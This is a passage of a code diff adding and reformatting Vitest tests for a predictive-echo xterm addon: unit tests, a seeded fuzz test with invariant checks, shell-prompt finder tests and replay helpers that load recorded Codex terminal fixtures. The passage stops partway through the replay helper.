||||
});
|
||||
const a = new PredictiveEchoAddon();
|
||||
a.activate(bare.terminal as never);
|
||||
expect(a.predictChar('x')).toBe(true);
|
||||
expect(a.predictChar('你')).toBe(false);
|
||||
a.dispose();
|
||||
bare.cleanup();
|
||||
});
|
||||
|
||||
it("'' and ' ' cell reads are equivalent for snapshot and confirm", async () => {
|
||||
// Snapshot beyond the line text reads '' -> normalized ' '
|
||||
mock.setLine(0, '› ');
|
||||
addon.predictChar('a'); // snapshot at col 2 is '' -> ' '
|
||||
// A repaint that writes explicit spaces must not count as foreign
|
||||
mock.setLine(0, '› ');
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
expect(addon.state.outstanding).toBe(1);
|
||||
expect(addon.state.droppedTotal).toBe(0);
|
||||
});
|
||||
|
||||
it('predictBackspace pops newest, returns false when empty, never touches confirmed', async () => {
|
||||
expect(addon.predictBackspace()).toBe(false);
|
||||
addon.reconcile(); // the empty pop armed the anchor hold; release it
|
||||
addon.predictChar('a');
|
||||
addon.predictChar('b');
|
||||
expect(addon.predictBackspace()).toBe(true);
|
||||
expect(addon.state.outstanding).toBe(1);
|
||||
expect(spansOf(mock).map((s) => s.textContent)).toEqual(['a']);
|
||||
|
||||
mock.setLine(0, '› a');
|
||||
mock.setCursor(3, 0);
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
expect(addon.state.confirmedTotal).toBe(1);
|
||||
expect(addon.predictBackspace()).toBe(false); // confirmed text is not popped
|
||||
});
|
||||
|
||||
it('clearPredictions empties the container, resets anchor, cancels the timer', () => {
|
||||
addon.predictChar('a');
|
||||
addon.predictChar('b');
|
||||
expect(vi.getTimerCount()).toBe(1);
|
||||
addon.clearPredictions();
|
||||
expect(spansOf(mock)).toHaveLength(0);
|
||||
expect(addon.state.outstanding).toBe(0);
|
||||
expect(addon.state.anchor).toBeNull();
|
||||
expect(vi.getTimerCount()).toBe(0);
|
||||
});
|
||||
|
||||
it('onWriteParsed reconcile is debounced to one pass per burst', async () => {
|
||||
addon.predictChar('a');
|
||||
mock.setLine(0, '› Z'); // foreign cell: each PASS increments mismatches
|
||||
mock.fireWriteParsed();
|
||||
mock.fireWriteParsed();
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
// Three synchronous fires coalesced into ONE pass: not dropped yet
|
||||
expect(addon.state.outstanding).toBe(1);
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
expect(addon.state.outstanding).toBe(0); // second pass cascades
|
||||
});
|
||||
|
||||
it('onResize clears predictions (cell geometry changed)', () => {
|
||||
addon.predictChar('a');
|
||||
mock.fireResize(120, 40);
|
||||
expect(addon.state.outstanding).toBe(0);
|
||||
expect(spansOf(mock)).toHaveLength(0);
|
||||
});
|
||||
|
||||
it('works without onWriteParsed via manual reconcile()', () => {
|
||||
const bare = composerMock({ emitters: false });
|
||||
const a = new PredictiveEchoAddon();
|
||||
a.activate(bare.terminal as never);
|
||||
a.predictChar('h');
|
||||
bare.setLine(0, '› h');
|
||||
bare.setCursor(3, 0);
|
||||
a.reconcile();
|
||||
expect(a.state.confirmedTotal).toBe(1);
|
||||
expect(a.state.outstanding).toBe(0);
|
||||
a.dispose();
|
||||
bare.cleanup();
|
||||
});
|
||||
|
||||
it('dispose unhooks listeners and removes the container', () => {
|
||||
expect(mock.writeParsedListenerCount()).toBe(1);
|
||||
expect(mock.resizeListenerCount()).toBe(1);
|
||||
addon.predictChar('a');
|
||||
addon.dispose();
|
||||
expect(mock.writeParsedListenerCount()).toBe(0);
|
||||
expect(mock.resizeListenerCount()).toBe(0);
|
||||
const screen = mock.terminal.element.querySelector('.xterm-screen')!;
|
||||
expect(screen.querySelector('[data-predictive-echo]')).toBeNull();
|
||||
expect(vi.getTimerCount()).toBe(0);
|
||||
});
|
||||
|
||||
it('every public method is safe before activate and after dispose', () => {
|
||||
const fresh = new PredictiveEchoAddon();
|
||||
expect(fresh.predictChar('a')).toBe(false);
|
||||
expect(fresh.predictBackspace()).toBe(false);
|
||||
fresh.clearPredictions();
|
||||
fresh.reconcile();
|
||||
fresh.refreshFont();
|
||||
fresh.setPredictWhen(() => true);
|
||||
expect(fresh.hasPredictions).toBe(false);
|
||||
expect(fresh.state.outstanding).toBe(0);
|
||||
|
||||
addon.dispose();
|
||||
expect(addon.predictChar('a')).toBe(false);
|
||||
expect(addon.predictBackspace()).toBe(false);
|
||||
addon.clearPredictions();
|
||||
addon.reconcile();
|
||||
addon.refreshFont();
|
||||
expect(addon.hasPredictions).toBe(false);
|
||||
});
|
||||
|
||||
it('hostile terminal stubs never propagate exceptions', () => {
|
||||
const hostile = {
|
||||
element: document.createElement('div'),
|
||||
cols: 80,
|
||||
rows: 24,
|
||||
options: {},
|
||||
buffer: {
|
||||
active: {
|
||||
viewportY: 0,
|
||||
baseY: 0,
|
||||
cursorX: 0,
|
||||
cursorY: 0,
|
||||
getLine: () => {
|
||||
throw new Error('boom');
|
||||
},
|
||||
},
|
||||
},
|
||||
};
|
||||
const a = new PredictiveEchoAddon();
|
||||
expect(() => a.activate(hostile as never)).not.toThrow();
|
||||
expect(a.predictChar('x')).toBe(false); // getLine throws inside -> caught
|
||||
expect(() => a.reconcile()).not.toThrow();
|
||||
a.dispose();
|
||||
|
||||
// Terminal with no render dimensions: addon inert, no throws
|
||||
const dimless = composerMock();
|
||||
// eslint-disable-next-line @typescript-eslint/no-explicit-any
|
||||
delete (dimless.terminal as any)._core;
|
||||
const b = new PredictiveEchoAddon();
|
||||
b.activate(dimless.terminal as never);
|
||||
expect(b.predictChar('x')).toBe(false);
|
||||
b.dispose();
|
||||
dimless.cleanup();
|
||||
});
|
||||
|
||||
it('underlinePredictions styles spans; refreshFont re-reads the rendered color', () => {
|
||||
const themed = composerMock({ theme: { foreground: '#aabbcc', background: '#112233' } });
|
||||
// The recipe prefers the computed .xterm-rows color (what xterm really
|
||||
// renders with); give the mock rows an explicit color like a real skin.
|
||||
const rows = themed.terminal.element.querySelector('.xterm-rows') as HTMLElement;
|
||||
rows.style.color = 'rgb(170, 187, 204)';
|
||||
const a = new PredictiveEchoAddon({ underlinePredictions: true });
|
||||
a.activate(themed.terminal as never);
|
||||
a.predictChar('u');
|
||||
const span = themed.terminal.element.querySelector('.xterm-screen span') as HTMLSpanElement;
|
||||
expect(span.style.textDecoration).toBe('underline');
|
||||
expect(span.style.color).toBe('rgb(170, 187, 204)');
|
||||
|
||||
rows.style.color = 'rgb(255, 0, 0)'; // skin change
|
||||
a.refreshFont();
|
||||
a.clearPredictions();
|
||||
a.reconcile(); // release the anchor hold armed by the clear
|
||||
a.predictChar('v');
|
||||
const span2 = themed.terminal.element.querySelector('.xterm-screen span') as HTMLSpanElement;
|
||||
expect(span2.style.color).toBe('rgb(255, 0, 0)');
|
||||
a.dispose();
|
||||
themed.cleanup();
|
||||
});
|
||||
|
||||
it('anchor hold: backspace into echoed text suppresses prediction until a write parses', async () => {
|
||||
// \x7f went to the wire with nothing outstanding: the cursor will move
|
||||
// in a way the display has not shown, so anchoring now paints one cell
|
||||
// off (review finding: "tehh" ghosts on backspace-then-retype at RTT)
|
||||
expect(addon.predictBackspace()).toBe(false);
|
||||
expect(addon.predictChar('x')).toBe(false);
|
||||
expect(spansOf(mock)).toHaveLength(0);
|
||||
mock.fireWriteParsed(); // the display caught up
|
||||
await flushMicrotasks();
|
||||
expect(addon.predictChar('x')).toBe(true);
|
||||
});
|
||||
|
||||
it('anchor hold: clearPredictions suppresses until a write parses (or manual reconcile)', async () => {
|
||||
addon.predictChar('a');
|
||||
addon.clearPredictions(); // consumer saw Enter/Esc/arrow/paste
|
||||
expect(addon.predictChar('b')).toBe(false);
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
expect(addon.predictChar('b')).toBe(true);
|
||||
});
|
||||
|
||||
it('anchor hold: the inline predictChar reconcile does NOT release it', () => {
|
||||
addon.clearPredictions();
|
||||
// Several keystrokes in a row before any echo: all suppressed, because
|
||||
// predictChar's inline pass must not count as the display catching up
|
||||
expect(addon.predictChar('a')).toBe(false);
|
||||
expect(addon.predictChar('b')).toBe(false);
|
||||
addon.reconcile(); // public/manual pass IS the caught-up contract
|
||||
expect(addon.predictChar('c')).toBe(true);
|
||||
});
|
||||
|
||||
it('state getter reports outstanding/confirmedTotal/droppedTotal/anchor', async () => {
|
||||
expect(addon.state).toEqual({ outstanding: 0, confirmedTotal: 0, droppedTotal: 0, anchor: null });
|
||||
addon.predictChar('a');
|
||||
addon.predictChar('b');
|
||||
expect(addon.state.outstanding).toBe(2);
|
||||
expect(addon.state.anchor).toEqual({ row: 0, col: 2 });
|
||||
expect(addon.hasPredictions).toBe(true);
|
||||
|
||||
mock.setLine(0, '› a');
|
||||
mock.setCursor(3, 0);
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
addon.clearPredictions();
|
||||
expect(addon.state.confirmedTotal).toBe(1);
|
||||
expect(addon.state.droppedTotal).toBe(1);
|
||||
expect(addon.hasPredictions).toBe(false);
|
||||
});
|
||||
});
|
||||
@@ -0,0 +1,125 @@
|
||||
/**
|
||||
* @vitest-environment jsdom
|
||||
*
|
||||
* Layer 3: seeded property fuzz against the REAL xterm parser. Random
|
||||
* interleavings of predictions, backspaces, clears, echo writes (correct,
|
||||
* partial, foreign), screen clears, scrolls and cursor jumps; invariants
|
||||
* checked after EVERY op:
|
||||
* 1. span count === outstanding record count, every span inside the grid
|
||||
* 2. no public method throws
|
||||
* 3. eventual convergence: after the run settles (TTL elapse + reconcile),
|
||||
* outstanding === 0 and the span container is empty
|
||||
*
|
||||
* Reproduce a failure with FUZZ_SEED=<seed> FUZZ_ITERS=<n> npx vitest run
|
||||
* test/predictive-echo-fuzz.test.ts (the failing seed+iter is in the
|
||||
* assertion message).
|
||||
*/
|
||||
import { describe, expect, it } from 'vitest';
|
||||
import { PredictiveEchoAddon } from '../src/predictive-echo-addon.js';
|
||||
import { CELL_H, CELL_W, createReplayTerminal } from './replay-helpers.js';
|
||||
|
||||
const SEED = Number(process.env.FUZZ_SEED ?? 1337);
|
||||
const TOTAL_ITERS = Number(process.env.FUZZ_ITERS ?? 500);
|
||||
const BATCHES = 4;
|
||||
const TTL_MS = 5;
|
||||
|
||||
function mulberry32(seed: number) {
|
||||
let a = seed >>> 0;
|
||||
return () => {
|
||||
a |= 0;
|
||||
a = (a + 0x6d2b79f5) | 0;
|
||||
let t = Math.imul(a ^ (a >>> 15), 1 | a);
|
||||
t = (t + Math.imul(t ^ (t >>> 7), 61 | t)) ^ t;
|
||||
return ((t ^ (t >>> 14)) >>> 0) / 4294967296;
|
||||
};
|
||||
}
|
||||
|
||||
const ALPHABET = [...'abcdefghij XZ!?', '你', '好', '😀'];
|
||||
|
||||
function sleep(ms: number) {
|
||||
return new Promise((r) => setTimeout(r, ms));
|
||||
}
|
||||
|
||||
async function fuzzIteration(iter: number, label: string) {
|
||||
const rand = mulberry32(SEED + iter);
|
||||
const rt = createReplayTerminal(60, 12);
|
||||
const addon = new PredictiveEchoAddon({ ttlMs: TTL_MS });
|
||||
addon.activate(rt.hybrid);
|
||||
const ctx = `${label} seed=${SEED} iter=${iter}`;
|
||||
|
||||
// Park the cursor mid-screen like a composer would
|
||||
await rt.write('\x1b[6;3H');
|
||||
|
||||
const ops = 4 + Math.floor(rand() * 12);
|
||||
for (let i = 0; i < ops; i++) {
|
||||
const r = rand();
|
||||
if (r < 0.35) {
|
||||
addon.predictChar(ALPHABET[Math.floor(rand() * ALPHABET.length)]);
|
||||
} else if (r < 0.43) {
|
||||
addon.predictBackspace();
|
||||
} else if (r < 0.48) {
|
||||
addon.clearPredictions();
|
||||
} else if (r < 0.62) {
|
||||
// Correct-ish echo: write a run of random chars at the anchor and
|
||||
// leave the cursor advanced (confirms whatever happens to match)
|
||||
const a = addon.state.anchor;
|
||||
if (a) {
|
||||
const n = 1 + Math.floor(rand() * 3);
|
||||
let text = '';
|
||||
for (let k = 0; k < n; k++) text += ALPHABET[Math.floor(rand() * ALPHABET.length)];
|
||||
await rt.write(`\x1b[${a.row + 1};${a.col + 1}H${text}`);
|
||||
}
|
||||
} else if (r < 0.72) {
|
||||
// Foreign rewrite across the anchor row
|
||||
await rt.write(`\x1b[6;1H${'Q'.repeat(1 + Math.floor(rand() * 20))}`);
|
||||
} else if (r < 0.8) {
|
||||
// Scroll: newlines at the bottom push history
|
||||
await rt.write(`\x1b[12;1H${'\r\n'.repeat(1 + Math.floor(rand() * 3))}`);
|
||||
} else if (r < 0.85) {
|
||||
await rt.write('\x1b[2J\x1b[H'); // clear screen + home
|
||||
} else if (r < 0.95) {
|
||||
addon.reconcile();
|
||||
} else {
|
||||
// Cursor jump
|
||||
const row = 1 + Math.floor(rand() * 12);
|
||||
const col = 1 + Math.floor(rand() * 60);
|
||||
await rt.write(`\x1b[${row};${col}H`);
|
||||
}
|
||||
await Promise.resolve(); // flush the debounced reconcile microtask
|
||||
|
||||
// Invariant 1: span/record parity + grid bounds, after every op
|
||||
expect(rt.spanCount(), ctx).toBe(addon.state.outstanding);
|
||||
for (const s of rt.spans()) {
|
||||
const left = parseFloat(s.style.left);
|
||||
const width = parseFloat(s.style.width);
|
||||
const top = parseFloat(s.style.top);
|
||||
expect(left + width, ctx).toBeLessThanOrEqual(60 * CELL_W);
|
||||
expect(top, ctx).toBeLessThanOrEqual(11 * CELL_H);
|
||||
expect(left, ctx).toBeGreaterThanOrEqual(0);
|
||||
}
|
||||
}
|
||||
|
||||
// Invariant 3: eventual convergence via echo/TTL, never via dispose
|
||||
if (addon.state.outstanding > 0) {
|
||||
await sleep(TTL_MS + 15);
|
||||
addon.reconcile();
|
||||
}
|
||||
expect(addon.state.outstanding, ctx).toBe(0);
|
||||
expect(rt.spanCount(), ctx).toBe(0);
|
||||
|
||||
addon.dispose();
|
||||
rt.cleanup();
|
||||
}
|
||||
|
||||
describe(`predictive echo fuzz (${TOTAL_ITERS} iterations, seed ${SEED})`, () => {
|
||||
const perBatch = Math.ceil(TOTAL_ITERS / BATCHES);
|
||||
for (let b = 0; b < BATCHES; b++) {
|
||||
it(`batch ${b + 1}/${BATCHES}`, async () => {
|
||||
const start = b * perBatch;
|
||||
const end = Math.min(start + perBatch, TOTAL_ITERS);
|
||||
for (let iter = start; iter < end; iter++) {
|
||||
await fuzzIteration(iter, `batch${b + 1}`);
|
||||
}
|
||||
}, 60000);
|
||||
}
|
||||
});
|
||||
@@ -4,159 +4,155 @@ import { findPrompt, readTextAfterPrompt } from '../src/prompt-finder.js';
|
||||
import type { XtermTerminal, PromptFinder } from '../src/types.js';
|
||||
|
||||
function term(lines: string[]) {
|
||||
return createMockTerminal({ buffer: { lines } });
|
||||
return createMockTerminal({ buffer: { lines } });
|
||||
}
|
||||
|
||||
describe('findPrompt', () => {
|
||||
describe('character strategy', () => {
|
||||
it('finds $ prompt at column 0', () => {
|
||||
const { terminal, cleanup } = term(['output line', '$ ls -la']);
|
||||
const finder: PromptFinder = { type: 'character', char: '$' };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).toEqual({ row: 1, col: 0 });
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('finds > prompt', () => {
|
||||
const { terminal, cleanup } = term(['> hello']);
|
||||
const finder: PromptFinder = { type: 'character', char: '>' };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).toEqual({ row: 0, col: 0 });
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('finds prompt with prefix (user@host)', () => {
|
||||
const { terminal, cleanup } = term(['user@host:~$ command']);
|
||||
const finder: PromptFinder = { type: 'character', char: '$' };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).toEqual({ row: 0, col: 11 });
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('scans bottom-up and returns lowest match', () => {
|
||||
const { terminal, cleanup } = term([
|
||||
'$ old prompt',
|
||||
'output',
|
||||
'$ current prompt',
|
||||
]);
|
||||
const finder: PromptFinder = { type: 'character', char: '$' };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).toEqual({ row: 2, col: 0 });
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('returns null when no prompt found', () => {
|
||||
const { terminal, cleanup } = term(['no prompt here', 'or here']);
|
||||
const finder: PromptFinder = { type: 'character', char: '$' };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).toBeNull();
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('finds Unicode prompt character', () => {
|
||||
const { terminal, cleanup } = term(['\u276f hello']);
|
||||
const finder: PromptFinder = { type: 'character', char: '\u276f' };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).toEqual({ row: 0, col: 0 });
|
||||
cleanup();
|
||||
});
|
||||
describe('character strategy', () => {
|
||||
it('finds $ prompt at column 0', () => {
|
||||
const { terminal, cleanup } = term(['output line', '$ ls -la']);
|
||||
const finder: PromptFinder = { type: 'character', char: '$' };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).toEqual({ row: 1, col: 0 });
|
||||
cleanup();
|
||||
});
|
||||
|
||||
describe('regex strategy', () => {
|
||||
it('finds regex prompt', () => {
|
||||
const { terminal, cleanup } = term(['user@host:~/dir$ ls']);
|
||||
const finder: PromptFinder = { type: 'regex', pattern: /\$/ };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).not.toBeNull();
|
||||
expect(pos!.col).toBe(15);
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('matches complex PS1 patterns', () => {
|
||||
const { terminal, cleanup } = term(['(venv) user % cmd']);
|
||||
const finder: PromptFinder = { type: 'regex', pattern: /%/ };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).not.toBeNull();
|
||||
expect(pos!.col).toBe(12);
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('returns null on no match', () => {
|
||||
const { terminal, cleanup } = term(['just output']);
|
||||
const finder: PromptFinder = { type: 'regex', pattern: /\$\s*$/ };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).toBeNull();
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('handles global flag safely (strips g to avoid lastIndex)', () => {
|
||||
const { terminal, cleanup } = term(['user@host:~$ cmd']);
|
||||
const finder: PromptFinder = { type: 'regex', pattern: /\$/g };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).not.toBeNull();
|
||||
expect(pos!.col).toBe(11);
|
||||
// Call again — should return same result (no lastIndex drift)
|
||||
const pos2 = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos2).toEqual(pos);
|
||||
cleanup();
|
||||
});
|
||||
it('finds > prompt', () => {
|
||||
const { terminal, cleanup } = term(['> hello']);
|
||||
const finder: PromptFinder = { type: 'character', char: '>' };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).toEqual({ row: 0, col: 0 });
|
||||
cleanup();
|
||||
});
|
||||
|
||||
describe('custom strategy', () => {
|
||||
it('uses custom finder function', () => {
|
||||
const { terminal, cleanup } = term(['anything']);
|
||||
const finder: PromptFinder = {
|
||||
type: 'custom',
|
||||
find: () => ({ row: 5, col: 10 }),
|
||||
};
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).toEqual({ row: 5, col: 10 });
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('handles null from custom finder', () => {
|
||||
const { terminal, cleanup } = term(['anything']);
|
||||
const finder: PromptFinder = {
|
||||
type: 'custom',
|
||||
find: () => null,
|
||||
};
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).toBeNull();
|
||||
cleanup();
|
||||
});
|
||||
it('finds prompt with prefix (user@host)', () => {
|
||||
const { terminal, cleanup } = term(['user@host:~$ command']);
|
||||
const finder: PromptFinder = { type: 'character', char: '$' };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).toEqual({ row: 0, col: 11 });
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('scans bottom-up and returns lowest match', () => {
|
||||
const { terminal, cleanup } = term(['$ old prompt', 'output', '$ current prompt']);
|
||||
const finder: PromptFinder = { type: 'character', char: '$' };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).toEqual({ row: 2, col: 0 });
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('returns null when no prompt found', () => {
|
||||
const { terminal, cleanup } = term(['no prompt here', 'or here']);
|
||||
const finder: PromptFinder = { type: 'character', char: '$' };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).toBeNull();
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('finds Unicode prompt character', () => {
|
||||
const { terminal, cleanup } = term(['\u276f hello']);
|
||||
const finder: PromptFinder = { type: 'character', char: '\u276f' };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).toEqual({ row: 0, col: 0 });
|
||||
cleanup();
|
||||
});
|
||||
});
|
||||
|
||||
describe('regex strategy', () => {
|
||||
it('finds regex prompt', () => {
|
||||
const { terminal, cleanup } = term(['user@host:~/dir$ ls']);
|
||||
const finder: PromptFinder = { type: 'regex', pattern: /\$/ };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).not.toBeNull();
|
||||
expect(pos!.col).toBe(15);
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('matches complex PS1 patterns', () => {
|
||||
const { terminal, cleanup } = term(['(venv) user % cmd']);
|
||||
const finder: PromptFinder = { type: 'regex', pattern: /%/ };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).not.toBeNull();
|
||||
expect(pos!.col).toBe(12);
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('returns null on no match', () => {
|
||||
const { terminal, cleanup } = term(['just output']);
|
||||
const finder: PromptFinder = { type: 'regex', pattern: /\$\s*$/ };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).toBeNull();
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('handles global flag safely (strips g to avoid lastIndex)', () => {
|
||||
const { terminal, cleanup } = term(['user@host:~$ cmd']);
|
||||
const finder: PromptFinder = { type: 'regex', pattern: /\$/g };
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).not.toBeNull();
|
||||
expect(pos!.col).toBe(11);
|
||||
// Call again — should return same result (no lastIndex drift)
|
||||
const pos2 = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos2).toEqual(pos);
|
||||
cleanup();
|
||||
});
|
||||
});
|
||||
|
||||
describe('custom strategy', () => {
|
||||
it('uses custom finder function', () => {
|
||||
const { terminal, cleanup } = term(['anything']);
|
||||
const finder: PromptFinder = {
|
||||
type: 'custom',
|
||||
find: () => ({ row: 5, col: 10 }),
|
||||
};
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).toEqual({ row: 5, col: 10 });
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('handles null from custom finder', () => {
|
||||
const { terminal, cleanup } = term(['anything']);
|
||||
const finder: PromptFinder = {
|
||||
type: 'custom',
|
||||
find: () => null,
|
||||
};
|
||||
const pos = findPrompt(terminal as unknown as XtermTerminal, finder);
|
||||
expect(pos).toBeNull();
|
||||
cleanup();
|
||||
});
|
||||
});
|
||||
});
|
||||
|
||||
describe('readTextAfterPrompt', () => {
|
||||
it('reads text after prompt with offset', () => {
|
||||
const { terminal, cleanup } = term(['$ hello world']);
|
||||
const prompt = { row: 0, col: 0 };
|
||||
const text = readTextAfterPrompt(terminal as unknown as XtermTerminal, prompt, 2);
|
||||
expect(text).toBe('hello world');
|
||||
cleanup();
|
||||
});
|
||||
it('reads text after prompt with offset', () => {
|
||||
const { terminal, cleanup } = term(['$ hello world']);
|
||||
const prompt = { row: 0, col: 0 };
|
||||
const text = readTextAfterPrompt(terminal as unknown as XtermTerminal, prompt, 2);
|
||||
expect(text).toBe('hello world');
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('returns empty string for empty prompt line', () => {
|
||||
const { terminal, cleanup } = term(['$ ']);
|
||||
const prompt = { row: 0, col: 0 };
|
||||
const text = readTextAfterPrompt(terminal as unknown as XtermTerminal, prompt, 2);
|
||||
expect(text).toBe('');
|
||||
cleanup();
|
||||
});
|
||||
it('returns empty string for empty prompt line', () => {
|
||||
const { terminal, cleanup } = term(['$ ']);
|
||||
const prompt = { row: 0, col: 0 };
|
||||
const text = readTextAfterPrompt(terminal as unknown as XtermTerminal, prompt, 2);
|
||||
expect(text).toBe('');
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('trims trailing whitespace', () => {
|
||||
const { terminal, cleanup } = term(['$ hello ']);
|
||||
const prompt = { row: 0, col: 0 };
|
||||
const text = readTextAfterPrompt(terminal as unknown as XtermTerminal, prompt, 2);
|
||||
expect(text).toBe('hello');
|
||||
cleanup();
|
||||
});
|
||||
it('trims trailing whitespace', () => {
|
||||
const { terminal, cleanup } = term(['$ hello ']);
|
||||
const prompt = { row: 0, col: 0 };
|
||||
const text = readTextAfterPrompt(terminal as unknown as XtermTerminal, prompt, 2);
|
||||
expect(text).toBe('hello');
|
||||
cleanup();
|
||||
});
|
||||
|
||||
it('handles offset for complex prompts', () => {
|
||||
const { terminal, cleanup } = term(['user@host:~$ ls -la']);
|
||||
const prompt = { row: 0, col: 11 };
|
||||
const text = readTextAfterPrompt(terminal as unknown as XtermTerminal, prompt, 2);
|
||||
expect(text).toBe('ls -la');
|
||||
cleanup();
|
||||
});
|
||||
it('handles offset for complex prompts', () => {
|
||||
const { terminal, cleanup } = term(['user@host:~$ ls -la']);
|
||||
const prompt = { row: 0, col: 11 };
|
||||
const text = readTextAfterPrompt(terminal as unknown as XtermTerminal, prompt, 2);
|
||||
expect(text).toBe('ls -la');
|
||||
cleanup();
|
||||
});
|
||||
});
|
||||
|
||||
@@ -0,0 +1,5 @@
|
||||
/** Vite `?raw` imports used by replay-helpers.ts (fixture JSONL as strings). */
|
||||
declare module '*.jsonl?raw' {
|
||||
const content: string;
|
||||
export default content;
|
||||
}
|
||||
@@ -0,0 +1,173 @@
|
||||
/**
|
||||
* Replay-test helpers: a structural hybrid terminal whose buffer, cursor and
|
||||
* onWriteParsed delegate to a REAL @xterm/headless Terminal (so fixtures run
|
||||
* through the real parser), while `element` is a jsdom div the addon can
|
||||
* paint spans into. Works because XtermTerminal is structurally typed.
|
||||
*
|
||||
* Also carries the test-side mirror of Codeman's classifyPredictInput() and
|
||||
* codex composer gate (the real ones live in terminal-ui.js and are pinned by
|
||||
* the repo's Layer 4 vm tests; keep the two in sync).
|
||||
*/
|
||||
import { Terminal } from '@xterm/headless';
|
||||
import type { XtermTerminal } from '../src/types.js';
|
||||
// ?raw imports keep the jsdom environment free of node: builtins
|
||||
import pasteBracketed from './fixtures/codex/paste-bracketed.jsonl?raw';
|
||||
import slashPicker from './fixtures/codex/slash-picker.jsonl?raw';
|
||||
import streamingBurst from './fixtures/codex/streaming-burst.jsonl?raw';
|
||||
import streamingReal from './fixtures/codex/streaming-real.jsonl?raw';
|
||||
import trustModal from './fixtures/codex/trust-modal.jsonl?raw';
|
||||
import typeHello from './fixtures/codex/type-hello.jsonl?raw';
|
||||
import wrap from './fixtures/codex/wrap.jsonl?raw';
|
||||
|
||||
const FIXTURES: Record<string, string> = {
|
||||
'paste-bracketed': pasteBracketed,
|
||||
'slash-picker': slashPicker,
|
||||
'streaming-burst': streamingBurst,
|
||||
'streaming-real': streamingReal,
|
||||
'trust-modal': trustModal,
|
||||
'type-hello': typeHello,
|
||||
wrap,
|
||||
};
|
||||
|
||||
export const CELL_W = 9;
|
||||
export const CELL_H = 18;
|
||||
|
||||
export interface FixtureLine {
|
||||
delayMs?: number;
|
||||
keyAt?: boolean;
|
||||
data: string;
|
||||
}
|
||||
|
||||
export interface FixtureMeta {
|
||||
scenario: string;
|
||||
cols: number;
|
||||
rows: number;
|
||||
codexVersion: string;
|
||||
recordedAt: string;
|
||||
}
|
||||
|
||||
export function loadFixture(name: string): { meta: FixtureMeta; lines: FixtureLine[] } {
|
||||
const content = FIXTURES[name];
|
||||
if (!content) throw new Error(`unknown fixture ${name}`);
|
||||
const raw = content
|
||||
.trim()
|
||||
.split('\n')
|
||||
.map((l) => JSON.parse(l));
|
||||
return { meta: raw[0] as FixtureMeta, lines: raw.slice(1) as FixtureLine[] };
|
||||
}
|
||||
|
||||
export interface ReplayTerminal {
|
||||
hybrid: XtermTerminal;
|
||||
term: Terminal;
|
||||
write(data: string): Promise<void>;
|
||||
cursorRowText(): string;
|
||||
rowText(viewportRow: number): string;
|
||||
spanCount(): number;
|
||||
spans(): HTMLSpanElement[];
|
||||
cleanup(): void;
|
||||
}
|
||||
|
||||
export function createReplayTerminal(cols: number, rows: number): ReplayTerminal {
|
||||
const term = new Terminal({ cols, rows, scrollback: 2000, allowProposedApi: true });
|
||||
|
||||
const element = document.createElement('div');
|
||||
element.className = 'terminal xterm';
|
||||
const screen = document.createElement('div');
|
||||
screen.className = 'xterm-screen';
|
||||
const rowsEl = document.createElement('div');
|
||||
